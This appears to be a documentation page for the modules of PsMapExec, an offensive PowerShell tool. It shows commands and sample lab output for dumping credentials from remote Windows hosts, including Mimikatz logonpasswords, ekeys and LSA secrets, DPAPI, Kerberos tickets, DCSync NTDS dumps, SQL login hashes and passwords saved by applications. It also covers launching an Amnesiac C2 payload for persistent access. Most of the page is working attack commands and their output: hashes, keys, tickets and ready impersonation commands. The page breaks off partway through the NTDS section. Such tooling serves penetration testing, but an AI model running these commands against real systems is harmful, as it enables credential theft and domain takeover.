04 ‐ Modules

Overview

In PsMapExec Modules are used to exececute premade scripts and blocks of code on remote systems. Likely, you have used similar premade code before with NetExec, where you might issue the following command to dump SAM hashes on a remote system;

nxc smb 10.10.10.100 -u user -p pass -d security.local --sam

Or in a similar fashion, like this with PsMapExec

pme smb -t 10.10.10.100 -u user -p pass -d security.local -m sam

Many of the modules in PsMapExec will produce a fair bit of output. By default module output is surpressed in the console and results are stored locally on disk and parsed within the console to only produce interesting information. If you wish to see the full output for each system you will need to append -ShowOutput to your commands.

⚔️ All Modules (Excluding LDAP)

Amnesiac
Console History
DPAPI
EventCreds
ekeys
Files
Filezilla
Kerbdump
LogonPasswords
LSA
MDF
Notepad
NTDS
NTLM
RDP
SAM
SCCM
SessionExec
SessionRelay
Snipped
SSH
TGTdeleg
VNC
Wi-FI
WinSCP

📜 LDAP Modules

Account Management
Group Management
- AddToGroup
- RemoveFromGroup
SPN Management
- AddSPN
- RemoveSPN
Delegation Management
Information Gathering
Privilege Escalation
- Elevate
Credential Extraction
- GMSA
- TimeRoast
Authentication & Validation
- whoami

🏴‍☠️ Pillaging

Console History
EventCreds
Files
FileZilla
MDF
Notepad
Snipped
SSH
VNC
Wi-fi
WinSCP

👥 Logon Session Abuse

NTLM
SessionExec
SessionRelay
TGTDeleg

❓ Other

Amnesiac
RDP

> Amnesiac

Description

This module automatically starts Amnesiac C2 in a seperate process on the attacking system. PsMapExec will then execute the appropriate payload on specified remote systems in order to establish a persistent connection back to the Amnesiac console window.

Once a session has been established on the required remote systems, it is highly recommended to consult the Amnesiac documentation to aid in post-exploitation.

Github: https://github.com/Leo4j/Amnesiac

Documentation: https://leo4j.gitbook.io/amnesiac/get-started/quick-start

Optional Parameters

Parameter	Value	Description
-Scramble	N/A	Scrambles the pipe name to a alternate value
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module Amnesiac

> Console History

Description

Enumerates for and reads the ConsoleHost_history.txt file within each accessible user directory. This file can often contain credentialed information that has been stored within the terminal.

For each system output is stored in $pwd\PME\PME\Console History\

Optional Parameters

Parameter	Value	Description
-ShowOutput	N/A	Displays each target's output to the console
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module ConsoleHistory -ShowOutput

PS > PsMapExec wmi -Targets all -Module ConsoleHistory -ShowOutput

WMI   10.10.10.5      SRV2012.security.local        Windows Server 2012 R2 Standard   [*] NO RESULTS
WMI   10.10.10.12     Security-CA.security.local    Windows Server 2019 Standard      [+] SUCCESS

-----[Administrator]-----
add-computer -DomainName security.local -DomainCredential security.local\administrator
ipconfig

WMI   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+]SUCCESS

-----[Administrator.SECURITY]-----
whoami ; hostname
get-service | Select-Object -First 15 |FL
sqlcmd -S sqlserver01.contoso.local\SQLEXPRESS -U sqluser -P P@ssw0rd123

-----[arbiter]-----
ssh [email protected]

> DPAPI

Description

This module elevates to SYSTEM on the target host and extracts and decrypts machine MasterKeys which is in turned used to identify and decrypt machine vaults and credentials.

For each system output is stored in $pwd\PME\PME\DPAPI\

Optional Parameters

Parameter	Value	Description
-ShowOutput	N/A	Displays each target output to the console
-SuccessOnly	N/A	Display only successful results

Usage

PsMapExec WMI -Targets [Targets] -Module DPAPI -ShowOutput

PS > PsMapExec WMI -Targets all -Module DPAPI -ShowOutput

WMI   10.2.10.12      sccm-distro.ludus.domain    Windows Server 2022 Standard Evaluation   [+] SUCCESS

< -- Snip -- >

[*] SYSTEM master key cache:
{5b16122a-d97a-4fa3-876a-9559f83a96d8}:4BE04912F7A6679FF691BCBFEE572FFDE614A010
{83171779-27c2-4763-9200-5bfea3be01d0}:8233DAEEA7C51CF70B546D2DD163FF547A2B714A
{9c19c98d-c55d-491a-973f-0310a02edfa1}:91175FC0DDE056145177563A109A121F22A52913
{a201902b-ec3e-4c14-9f1a-ba17d3988e80}:F475E3789DA3467B7512A18E5FDD24DA6F12B3CC
{ea477cba-d82d-48e4-8ee2-d99a8740c7df}:FDEDB0C27A7048F36CB41737D581527E2E291979
{3ba46d27-0d59-4ee4-96be-a1ccefe6036b}:F7624E9F780D77C799D60BE0EC7C4051036FAECD

[*] Triaging System Credentials


Folder       : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials


  CredFile           : B35F1E4B65404C44D90921DE298F2589
    guidMasterKey    : {ea477cba-d82d-48e4-8ee2-d99a8740c7df}
    size             : 544
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data



    guidMasterKey    :
    size             : 266
    flags            : 0x00000030 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data
    LastWritten      : 6/19/2025 8:22:54 AM
    TargetName       : Domain:batch=TaskScheduler:Task:{34F1D61B-D545-4A3E-ABB3-70D14BB72151}
    TargetAlias      :
    Comment          :
    UserName         : ludus\domainadmin
    Credential       : password

> EventCreds

Parses Sysmon Event ID 1 and Security Event Log ID 4688 for command line credentials

For each system output is stored in $pwd\PME\EventCreds\

Optional Parameters

Parameter	Value	Description
-ShowOutput	N/A	Displays each target's output to the console
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module EventCreds -ShowOutput

PS > PsMapExec wmi -Targets all -Module ekeys -ShowOutput

WMI   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard    [+] SUCCESS

TimeCreated       : 05/07/2025 16:46:07
AccountName       : SECURITY\Moe
ProcessName       : C:\Windows\System32\net.exe
ParentProcessName : C:\Windows\System32\cmd.exe
CommandLine       : net  user testu /add Password123

TimeCreated       : 05/07/2025 16:46:03
AccountName       : SECURITY\Moe
ProcessName       : C:\Windows\System32\net.exe
ParentProcessName : C:\Windows\System32\cmd.exe
CommandLine       : net  user test /add Password123

TimeCreated       : 04/07/2025 21:23:20
AccountName       : SECURITY\Moe
ProcessName       : C:\Windows\System32\wbem\WMIC.exe
ParentProcessName : C:\Windows\System32\cmd.exe
CommandLine       : wmic  /node:"TARGETHOST" /user:AdminUser /password:Adm1nP@ss process call create "cmd.exe /c whoami"

TimeCreated       : 04/07/2025 21:22:50
AccountName       : SECURITY\Moe
ProcessName       : C:\Windows\System32\sc.exe
ParentProcessName : C:\Windows\System32\cmd.exe
CommandLine       : sc.exe  create MyService binPath= "C:\MyApp\app.exe" obj= "DOMAIN\ServiceAcct" password=SvcP@s

> eKeys

Executes Mimikatz's sekurlsa::ekeys on each target system to retrieve Kerberos encryption keys.

For each system output is stored in $pwd\PME\eKeys\

Optional Parameters

Parameter	Value	Description
-NoParse	N/A	If specified, PsMapExec will not automatically parse output from all target systems and identify accounts that belong to privileged groups.
-ShowOutput	N/A	Displays each target's output to the console
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module eKeys -ShowOutput

PS > PsMapExec wmi -Targets all -Module ekeys -ShowOutput

WMI   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard    [+] SUCCESS

OtkMCEyH(powershell) # token::elevate
TOkEn ID  : 0
usER namE : 
SID NaME  : NT AUTHORITY\SYSTEM

584	{0;000003e7} 1 D 21623     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 --> Success!
 - PRocesS tOKEN : {0;02186d64} 0 D 35156221  	SECURITY\Moe	S-1-5-21-1201573619-2117991115-2379797238-1115	(11g,24p)	Pri
mary
 - THreaD tOKEN  : {0;000003e7} 1 D 35205141  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)

OtkMCEyH(powershell) # sekurlsa::ekeys

aUtHEnTICatION id : 0 ; 9945342 (00000000:0097c0fe)
SESSion           : Interactive from 1
User Name         : Administrator
dOmAin            : SECURITY
lOgOn seRVer      : DC01
loGOn TIMe        : 18/05/2025 16:17:04
siD               : S-1-5-21-1201573619-2117991115-2379797238-500

	 - usERNAmE : Administrator
	 - DoMAiN   : SECURITY.LOCAL
	 - PASswOrd : (null)
	 - keY list :
	   aes256_hmaC       8bf4e9d571a39107152b782b0ea873cf7e874e09883592e9e91614f91bb0ce08
	   rc4_hMAc_NT       602f5c34346bc946f9ac2c0922cd9ef6
	   RC4_HmAC_OlD      602f5c34346bc946f9ac2c0922cd9ef6

<-- Snip -->

Parsing

PsMapExec will parse the results from each system and present the results in a digestable and readable format. The notes field will highlight in yellow any interesting information about each result.

The table below shows the possible values for the notes field.

Value	Description
AdminCount=1	The parsed account has an AdminCount value of 1. This means the account may hold some sort of privileged access within the domain.
rc4_hmac_nt=Empty Password	The rc4 value is equal to that of an empty password.
Cleartext Password	Cleartext password was parsed from the results. This is only highlighted on user accounts and omitted for computer accounts.
Domain Admin Enterprise Admin Server Operator Account Operator	The account is a member of a high value group.

PS> PsMapExec wmi -Targets all -Module ekeys

WMI   10.10.10.12     Security-CA.security.local    Windows Server 2019 Standard      [+] SUCCESS
WMI   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SUCCESS

Parsing Results

-[MSSQL02.security.local]-

Username    : security.local\Administrator
aes256_hmac : 8bf4e9d571a39107152b782b0ea873cf7e874e09883592e9e91614f91bb0ce08
rc4_hmac_nt : 602f5c34346bc946f9ac2c0922cd9ef6
Notes       : [AdminCount=1] [Domain Admin] [Enterprise Admin] [Schema Admin] [Group Policy Creator Owner] 

Username    : security.local\arbiter
aes256_hmac : 843392598e6333d0cc5bf77cf7a5f15d64e669823ab6d747ed32d013f0915342
rc4_hmac_nt : 58a478135a93ac3bf058a5ea0e8fdb71

Username    : security.local\mssql02$
aes256_hmac : 8ff6e135e27212cc3fa79927f28ec26ad81a098c42c55f83a84efb1ffa54ddde
rc4_hmac_nt : b58cff1e40f33c061af24cd485a07f33


-[Security-CA.security.local]-

Username    : security.local\security-ca$
aes256_hmac : 2e37844392f8fa1991f79e4d6f0220c017513787fe87865e352691e2d3b466bf
rc4_hmac_nt : 6e0028f4965e20e922fde677e40f9831

> Files

Description

The Files module will enumerate non-default files within the home and primary directories for each accessible user on the remote system.

This can be used to help identify interesting files on each system for which may contain sensitive or credentialed information.

For each system output is stored in $pwd\PME\PME\User Files\

Optional Parameters

Parameter	Value	Description
-ShowOutput	N/A	Displays each target's output to the console
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module Files -ShowOutput

PS C:\Users\moe> PsMapExec wmi -Targets all -username moe -Password Password123! -module files -ShowOutput

WMI   10.10.10.17     MSSQL01.security.local   Windows Server 2022 Standard   [+] SUCCESS
----------------------------------------------------------------------------------------------
[User] Administrator

[Downloads]
- firefox.msi (223080.02 KB)

[Documents]
- Sever_Backup_Passwords.xlsx (16.32 KB)

[Desktop]
- Add_Admin.ps1 (1.20 KB)
- keepass_pw.7z (1.27 KB)
- Passwords.txt (5.16 KB)
----------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------
[User] vagrant

[Home]
- .vbox_version (0.01 KB)
----------------------------------------------------------------------------------------------

> FileZilla

Description

This module iterates through each users %APPDATA% folder on the target host and identifies files associated with FileZilla that often store credentials such as:

%AppData%\FileZilla\sitemanager.xml
%AppData%\FileZilla\recentservers.xml

Any discovered credentials will be decoded to the plaintext value if not encrypted by a master password.

For each system output is stored in $pwd\PME\PME\FileZilla\

Optional Parameters

Parameter	Value	Description
-ShowOutput	N/A	Displays each target output to the console
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module FileZilla -ShowOutput

PS > PsMapExec winrm -Targets all -Module filezilla -ShowOutput

WinRM   10.10.10.12     Security-CA.security.local    Windows Server 2019 Standard      [*] NO RESULTS
WinRM   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SUCCESS

Path: C:\Users\Administrator.SECURITY\AppData\Roaming\FileZilla\sitemanager.xml

=================================
Host     : security.local
Port     : 21
User     : ftp
Password : Password123!
=================================

=================================
Host     : 10.10.100.29
Port     : 221
User     : grunt
Password : HighCharity!!
=================================

WinRM   10.10.10.111    DC02.security.local           Windows Server 2019 Standard      [*] NO RESULTS

> KerbDump

Dumps Kerberos tickets on the remote system. The code is based on PowerShell Kerberos by Michael Zhmaylo (MzHmO): https://github.com/MzHmO/PowershellKerberos

For each system output is stored in $pwd\PME\Tickets\KerbDump\

Optional Parameters

Parameter	Value	Description
-NoParse	N/A	If specified, PsMapExec will not automatically parse output from all target systems and identify accounts that belong to privileged groups.
-ShowOutput	N/A	Displays each target's output to the console
-SuccessOnly	N/A	Display only successful results
-Option	kerbdump:monitor:5	Runs on a loop on the remote host for 5 minutes collecting tickets

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module KerbDump -ShowOutput

# Monitor collection for 15 minutes on remote host
PsMapExec [Method] -Targets [Targets] -Module KerbDump -ShowOutput -Option "kerbdump:monitor:15"

PS > PsMapExec smb -Targets all -Module kerbdump -ShowOutput

SMB   10.10.10.5      SRV2012.security.local        Windows Server 2012 R2 Standard   [+] SUCCESS

Service Name     : krbtgt/SECURITY.LOCAL
EncryptionType   : AES256_CTS_HMAC_SHA1_96
Ticket Exp       : 21/05/2025 04:00:42
Server Name      : [email protected]
UserName         : [email protected]
Flags            : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Session Key Type : AES256_CTS_HMAC_SHA1_96n

-[Ticket]-

 doIFnjCCBZqgAwIBBaEDAgEWooIEnTCCBJlhggSVMIIEkaADAgEFoRAbDlNFQ1VSSVRZLkxPQ0FMoiMwIaADAgECoRowGBsGa3JidGd0Gw5TRUNVUklUWS5
MT0NBTKOCBFEwggRNoAMCARKhAwIBAqKCBD8EggQ7NwR5BrieKrzx4jlVKlIW7mLyg16e0iMlTTfDLgeSthdc7wqOpufiEdS/0se5rJ2hVQynkk+UWArVBOO
<-- Snip -->

Service Name     : krbtgt/DEV.SECURITY.LOCAL
EncryptionType   : AES256_CTS_HMAC_SHA1_96
Ticket Exp       : 19/05/2025 02:03:24
Server Name      : [email protected]
UserName         : [email protected]
Flags            : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
Session Key Type : AES256_CTS_HMAC_SHA1_96n

-[Ticket]-

 doIFoTCCBZ2gAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoRAbDlNFQ1VSSVRZLkxPQ0FMoicwJaADAgECoR4wHBsGa3JidGd0GxJERVYuU0VDVVJ
JVFkuTE9DQUyjggRMMIIESKADAgESooIEPwSCBDvkJOOS6fspu8E6vL+ldWHJLHyp1TaqBatWOzVB1GMIo+kbU3xvQZmSYOOStjakNSwn2KYh0z9YEzMWZZF
<-- Snip -->

Service Name     : cifs/DC02.security.local
EncryptionType   : AES256_CTS_HMAC_SHA1_96
Ticket Exp       : 21/05/2025 04:00:42
Server Name      : [email protected]
UserName         : [email protected]
Flags            : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
Session Key Type : AES256_CTS_HMAC_SHA1_96n

-[Ticket]-

 doIGBjCCBgKgAwIBBaEDAgEWooIFAjCCBP5hggT6MIIE9qADAgEFoRAbDlNFQ1VSSVRZLkxPQ0FMoiYwJKADAgECoR0wGxsEY2lmcxsTREMwMi5zZWN1cml
0eS5sb2NhbKOCBLMwggSvoAMCARKhAwIBAaKCBKEEggSdJ1UjM7kOwLFOptlABDiodhOqNSe5WbU+UYzfExGAnLoT19zGHPbP355okiC+ioWmMxKlasgkCh+
<-- Snip -->

Parsing

PsMapExec will parse the results from each system and present the results in a digestable and readable format. The notes field will highlight in yellow any interesting information about each result.

Tickets identified as a TGT will also show an easy command to execute directly after with PsMapExec to impersonate that account within the Impersonate field.

The table below shows the possible values for the notes field.

Value	Description
TGT	Represents a TGT ticket
AdminCount=1	Identifies an account that may hold privileged permissions within the domain
Domain Admin Enterprise Admin Server Operator Account Operator	The account is a member of one of these privileged groups

Parsing Results

-[DC01.security.local-Tickets]-

User Name     : security\Moe
Service Name  : krbtgt/security.local
Ticket Expiry : 20/05/2025 21:35:11
Notes         : [Domain Admin] [TGT] 
Impersonate   : PsMapExec -Targets all -Method smb -Ticket $xUAVFqZciwjQznsN

User Name     : security\Administrator
Service Name  : krbtgt/security.local
Ticket Expiry : 18/05/2025 21:23:44
Notes         : [Domain Admin] [Enterprise Admin] [Schema Admin] [Group Policy Creator Owner] [TGT] 
Impersonate   : PsMapExec -Targets all -Method smb -Ticket $kpHbuTtVClYqLXdF

-[MSSQL02.security.local-Tickets]-

User Name     : security\Administrator
Service Name  : krbtgt/security.local
Ticket Expiry : 21/05/2025 05:43:03
Notes         : [Domain Admin] [Enterprise Admin] [Schema Admin] [Group Policy Creator Owner] [TGT] 
Impersonate   : PsMapExec -Targets all -Method smb -Ticket $eBsmwhNinRVqatpO

User Name     : security\arbiter
Service Name  : krbtgt/security.local
Ticket Expiry : 19/05/2025 02:21:26
Notes         : [TGT] 
Impersonate   : PsMapExec -Targets all -Method smb -Ticket $JHhdIEATgZrNeBqF

[*] Only interesting results have  been shown. Computer accounts are omitted
[*] Run with -NoParse to prevent parsing results in the future
[*] Each ticket has been stored in C:\Users\moe\PME\Tickets

> LogonPasswords

Executes Mimikatz's sekurlsa::logonpasswords on the target system.

Output for each system is stored in $pwd\PME\LogonPasswords\

Optional Parameters

Parameter	Value	Description
-NoParse	N/A	If specified, PsMapExec will not automatically parse output from all target systems and identify accounts that belong to privileged groups.
-Rainbow	N/A	When provided, collected hashes will be compared against an online database ntlm.pw
-ShowOutput	N/A	Displays each target's output to the console
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module LogonPasswords -ShowOutput

PS > PsMapExec winrm -Targets servers -Module logonpasswords -ShowOutput

WinRM   10.10.10.17     MSSQL01.security.local       Windows Server 2022 Standard      [+] SUCCESS

<-- Snip -->

OtkMCEyH(powershell) # sekurlsa::logonpasswords

aUtHEnTICatION id : 0 ; 9945342 (00000000:0097c0fe)
SESSion           : Interactive from 1
User Name         : Administrator
dOmAin            : SECURITY
lOgOn seRVer      : DC01
loGOn TIMe        : 18/05/2025 16:17:04
siD               : S-1-5-21-1201573619-2117991115-2379797238-500
	MSv :	
	 [00000003] Primary
	 - usERNAmE : Administrator
	 - DoMAiN   : SECURITY
	 - Ntlm     : 602f5c34346bc946f9ac2c0922cd9ef6
	 - sHA1     : 1b4c7a2c1b58e59d184291da8436b4c9f3b26c50
	 - Dpapi    : 67001f544cbcb8c06d0ad55a9f44ec79
	tspKg :	
	wdIgESt :	
	 - usERNAmE : Administrator
	 - DoMAiN   : SECURITY
	 - PASswOrd : (null)
	KERBerOS :	
	 - usERNAmE : Administrator
	 - DoMAiN   : SECURITY.LOCAL
	 - PASswOrd : (null)
	sSp :	
	CredmAn :	

<-- Snip -->

Parsing

PsMapExec will parse the results from each system and present the results in a digestable and readable format. The notes field will highlight in yellow any interesting information about each result.

The table below shows the possible values for the notes field.

Value	Description
AdminCount=1	The parsed account has an AdminCount value of 1. This means the account may hold some sort of privileged access within the domain.
NTLM=Empty Password	The NTLM value is equal to that of an empty password.
Cleartext Password	Cleartext password was parsed from the results. This is only highlighted on user accounts and omitted for computer accounts.
Domain Admin Enterprise Admin Server Operator Account Operator	The account is a member of a high value group.

At the end of parsing all unique NTLM hashes will be shown in the console window. A Hashcat ready file will also be populated for collected NTLM hashes in $pwd\PME\LogonPasswords\.AllUniqueNTLM.txt

Parsing Results


-[DC01.security.local]-

Username  : security\dc01$
NTLM      : 04b219f63c94d1405ce3d11b64dcafe3

Username  : security\administrator
NTLM      : 602f5c34346bc946f9ac2c0922cd9ef6
Notes     : [AdminCount=1] [Domain Admin]  [Enterprise Admin]  [Schema Admin]  [Group Policy Creator Owner] 

-[MSSQL02.security.local]-

Username  : security\arbiter
NTLM      : 58a478135a93ac3bf058a5ea0e8fdb71

Username  : security\administrator
NTLM      : 602f5c34346bc946f9ac2c0922cd9ef6
Notes     : [AdminCount=1] [Domain Admin]  [Enterprise Admin]  [Schema Admin]  [Group Policy Creator Owner] 

Username  : security\mssql02$
NTLM      : b58cff1e40f33c061af24cd485a07f33
Password  : __:J^>H-xSm#Vz1*Bo )h.UAW6/g"imk+w?]e `)(d6v,s\A`,<>serEzD$b./<w&9P,2ZP3ayU'U(T&k@2Oq8/SXQbtOUA?gBOO\!+)uqvW
TMz5Up7wJq\o

-[SRV2012.security.local]-

Username  : security\srv2012$
NTLM      : d167e284b82d44414b3eb49cab3c98db
Password  : -0P,Nv[ =1)%0&y,q!nfe-5>8,;k1an%w'*<k8\3oahnOo:Ix=h_lQH5W]&Lx*1UBx7)DC.peI77)MYqY*>1q&sj%6SAq?v-%rJwZ^sJwYeQ
#6`jffD)$9Y2


-------------------------------------- All collected NTLM User Hashes (Unique) --------------------------------------

SECURITY\Administrator:602f5c34346bc946f9ac2c0922cd9ef6
SECURITY\arbiter:58a478135a93ac3bf058a5ea0e8fdb71

---------------------------------------------------------------------------------------------------------------------

> LSA

Executes Mimikatz's lsadump::secrets on the target system.

Output for each system is stored in $pwd\PME\LSA\

Optional Parameters

Parameter	Value	Description
-ShowOutput	N/A	Displays each target's output to the console
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module LSA -ShowOutput

PS > PsMapExec wmi -Targets all -Module lsa -ShowOutput

WMI   10.10.10.12     Security-CA.security.local    Windows Server 2019 Standard      [+] SUCCESS
OtkMCEyH(powershell) # token::elevate
TOkEn ID  : 0
usER namE : 
SID NaME  : NT AUTHORITY\SYSTEM

<-- Snip -->

Local name : SECURITY-CA ( S-1-5-21-3711964894-3574166338-3279816048 )
Domain name : SECURITY ( S-1-5-21-1201573619-2117991115-2379797238 )
doMAin fQDN : security.local

SubSystEm PoLicY : 1.18
Key (LSA) : 1, default {5ccec7da-ce6c-f1a1-1603-bd620f5adf8e}
  [00] {5ccec7da-ce6c-f1a1-1603-bd620f5adf8e} 089155f9725437690724e850c8a7a766b9e4b47f08b1d683d7d7875149fc3ed6

seCReT  : $MACHINE.ACC
cur/text: Ys4QWFKbb`D3U%,8xzZzB4B<Ld*EUMR2\vr-=PjrqVMq<L4)t+,9S3`+3(7kN`F:>RKK]MNj(L?*zpuw=Ik;VTOF>rT5pWm*q6@hb=T!i2rm(i
Y^Axteh`2C
    NtLm:6e0028f4965e20e922fde677e40f9831
    SHA1:c54987aa5b2a5b61b2cb8395ee1b17d391028fe0
old/text: Ys4QWFKbb`D3U%,8xzZzB4B<Ld*EUMR2\vr-=PjrqVMq<L4)t+,9S3`+3(7kN`F:>RKK]MNj(L?*zpuw=Ik;VTOF>rT5pWm*q6@hb=T!i2rm(i
Y^Axteh`2C
    NtLm:6e0028f4965e20e922fde677e40f9831
    SHA1:c54987aa5b2a5b61b2cb8395ee1b17d391028fe0

seCReT  : DPAPI_SYSTEM
cur/Hex : 01 00 00 00 52 a2 71 88 6b f2 a2 67 64 64 3c 02 aa 93 9a 9f d8 2d e2 a0 76 3f d1 33 9e 98 7d f7 2c a8 b0 09 d0
 d1 77 e6 09 5f 75 d2 
    full: 52a271886bf2a26764643c02aa939a9fd82de2a0763fd1339e987df72ca8b009d0d177e6095f75d2
    m/u : 52a271886bf2a26764643c02aa939a9fd82de2a0 / 763fd1339e987df72ca8b009d0d177e6095f75d2
old/Hex : 01 00 00 00 38 7f 34 6e fb 32 df d3 ba 41 46 89 89 ce 36 16 08 65 20 cc 63 5e 11 dd 43 93 10 ab 45 0b 4a 60 6d
 52 1d 9b 26 06 67 cd 
    full: 387f346efb32dfd3ba41468989ce3616086520cc635e11dd439310ab450b4a606d521d9b260667cd
    m/u : 387f346efb32dfd3ba41468989ce3616086520cc / 635e11dd439310ab450b4a606d521d9b260667cd

seCReT  : NL$KM
cur/Hex : eb dc cc 16 6c 51 90 4d 94 74 3b 1e 89 df e1 ad 88 20 f9 c5 83 34 d4 bb 93 98 41 b2 6e d2 83 2b 68 5b b7 e3 b8
 0d d6 00 d4 75 6d 71 0a 87 a0 d0 83 80 f6 13 1a 26 a9 20 d9 f2 e6 26 7a 82 46 ff 
old/Hex : eb dc cc 16 6c 51 90 4d 94 74 3b 1e 89 df e1 ad 88 20 f9 c5 83 34 d4 bb 93 98 41 b2 6e d2 83 2b 68 5b b7 e3 b8
 0d d6 00 d4 75 6d 71 0a 87 a0 d0 83 80 f6 13 1a 26 a9 20 d9 f2 e6 26 7a 82 46 ff

> MDF

This module creates a Volume Shadow Copy of the running MSSQL database, allowing the master.mdf file to be safely copied even while in use. It then extracts the login password hashes found within the master database ready to be cracked with hashcat.

Based on Invoke-MDF
Which is based on the original work of XPN

Parameter	Value	Description
-ShowOutput	N/A	Displays each target's output to the console
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module MDF -ShowOutput

PsMapExec WinRM -Targets servers -Module mdf -ShowOutput

WinRM   172.16.109.187  sql03.final.com    Windows Server 2019 Standard   [+] SUCCESS
[+] Database successfully copied to: C:\Users\tina\AppData\Local\632364668.mdf

Name  : sa
Value : 0x020050B40C7843AC5C196F9375549D3566583A5C5D2E888353D0C3F9C973446A0

WinRM   172.16.109.188  sql11.final.com    Windows Server 2019 Standard   [+] SUCCESS
[+] Database successfully copied to: C:\Users\tina\AppData\Local\1390080740.mdf

Name  : sa
Value : 0x02003D821CF3B3D1DE294A3CFED043AD755B33D3258A39A706B3AA282F72A81D50

> Notepad

This module searches for stored data in various applications in the following locations as referenced in the table below;

Application	Location
Notepad++	`C:\Users\<UserProfile>\AppData\Roaming\Notepad++\backup\`
Notepad (Windows 11/Server 2025)	`C:\Users\<UserProfile>\AppData\Local\Packages\Microsoft.WindowsNotepad_*\LocalState\TabState\`
Visual Studio Code	`C:\Users\<UserProfile>\AppData\Roaming\Code\Backups`
PowerShell_ISE	`C:\Users\<UserProfile>\AppData\Local\Microsoft_Corporation\powershell_ise*\`

Default behavior in Windows 11 and Windows Server 2025 is to store Notepad files on disk in binary files. This module will attempt to extract readable strings from these files.

For each system output is stored in $pwd\PME\PME\Notepad\

Optional Parameters

Parameter	Value	Description
-ShowOutput	N/A	Displays each target's output to the console
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module Notepad -ShowOutput

> Example Output


PS > PsMapExec wmi -Targets all -Module notepad -ShowOutput

WMI   10.10.10.12     Security-CA.security.local    Windows Server 2019 Standard      [*] NO RESULTS
WMI   10.10.10.4      WS-Applocker.security.local   Windows 11 Pro                    [+] SUCCESS
=========================================================================================
File Path: C:\Users\moe\AppData\Local\Packages\Microsoft.WindowsNotepad_8wekyb3d8bbwe\LocalState\TabState\2d94e1de-9248-
48e6-8ef4-63f9ec35c778.bin

Must change the domain admin password to something longer than 5 characters..
=========================================================================================

WMI   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SUCCESS
=========================================================================================
File Path: C:\Users\Administrator.SECURITY\AppData\Roaming\Notepad++\backup\new 1@2025-05-21_202358

SSH password for finance server:  P~@Sw0rd!)!
=========================================================================================
File Path: C:\Users\Administrator.SECURITY\AppData\Roaming\Notepad++\backup\new 2@2025-05-21_202414

[email protected]
[email protected]
[email protected]
[email protected]
=========================================================================================

WMI   10.10.10.17     MSSQL01.security.local        Windows Server 2022 Standard      [*] NO RESULTS
WMI   10.10.10.111    DC02.security.local           Windows Server 2019 Standard      [*] NO RESULTS

> NTDS

Executes Mimikatz's lsadump::dcsync on the target system. Parses the NTDS file to replicate Secretsdump output. No files are created on disk on the target system.

Output for each system is stored in $pwd\PME\DCSync\DCSync_Full_Dump

Note: There should be a link here to DCSync method as the outcome is the same.

Optional Parameters

Parameter	Value	Description
-NoParse	N/A	Will omit parsing output from the method. Will simply extract the NTDS file in a hashcat-friendly format
-Rainbow	N/A	When provided, collected hashes will be compared against an online database (ntlm.pw)
-ShowOutput	N/A	Displays each target's output to the console
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module NTDS -ShowOutput

PS > PsMapExec wmi -Targets DC02 -Module NTDS -ShowOutput

WMI   10.10.10.111    DC02.security.local   Windows Server 2019 Standard   [+] SUCCESS

DC01$::aad3b435b51404eeaad3b435b51404ee:04b219f63c94d1405ce3d11b64dcafe3:::
krbtgt::aad3b435b51404eeaad3b435b51404ee:bca1f3ee9cb3b27da08a2d754fffff7d:::
Administrator::aad3b435b51404eeaad3b435b51404ee:602f5c34346bc946f9ac2c0922cd9ef6:::
SECURITY-CA$::aad3b435b51404eeaad3b435b51404ee:6e0028f4965e20e922fde677e40f9831:::
WS-APPLOCKER$::aad3b435b51404eeaad3b435b51404ee:8d827964afd7526ebd1c9fddbd85f899:::

<-- Snip -->

Parsing

PsMapExec parses the results from the NTDS dump and presents them in a digestible, structured format. Based on the findings, the parsed data will typically follow a layout similar to the example below:

C:\Users\moe\PME\DCSync\DCSync_Full_Dump
└── DC02.security.local-NTDS_Parsed_92853
    ├── Computer Data
    │   └── Computer-Hashes.txt

    ├── Full NTDS Dump
    │   └── DC02.security.local-NTDS.txt

    └── User Data
        ├── 1.All-User-Hashes.txt
        ├── 1.Enabled-User-Hashes.txt
        ├── 2.All-Users-With-Empty-Passwords.txt
        ├── 2.Enabled-Users-With-Empty-Passwords.txt
        ├── 3.All-Users-With-Password-As-Account-Name.txt
        ├── 3.Enabled-Users-With-Password-As-Account-Name.txt
        └── 4.Enabled-Users-With-Identical-Passwords.txt

Purpose of Parsing

The goal of parsing is twofold:

Password Cracking Prep
